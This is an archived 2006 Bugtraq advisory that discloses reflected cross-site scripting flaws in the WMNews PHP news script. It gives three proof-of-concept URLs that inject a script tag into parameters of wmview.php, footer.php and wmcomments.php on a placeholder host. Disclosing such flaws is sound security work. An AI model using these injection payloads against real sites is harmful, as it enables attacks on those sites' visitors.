lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060312205039.24169.qmail@securityfocus.com> Date: 12 Mar 2006 20:50:39 -0000 From: exalibur33@...il.com To: bugtraq@...urityfocus.com Subject: WMNews Cross Site Scripting ------------------------------------------------------------------------------------- WMNews Cross Site Scripting Site:http://wartamikael.org/PHPScripts/ Demo:http://www.scriptevi.com/files/demo/news/wmnews/ --------------------------------------------------- Credit : R00T3RR0R webpage:www.biyosecurity.be Mail :exalibur33@...il.com ------------------------------------------------------------------------------------- WMNews http://victim/path/wmview.php?ArtCat="><script>alert(/R00T3RR0R/)</script> http://victim/path/footer.php?ctrrowcol="><script>alert(/R00T3RR0R/)</script> http://victim/path/wmcomments.php?act=vi&CmID=2&ArtID="><script>alert(/R00T3RR0R/)</script> ---------------------------------------------------------------------------------------- Source: http://www.blogcu.com/Liz0ziM/350164/ http://biyosecurity.be/bugs/wmnews.txt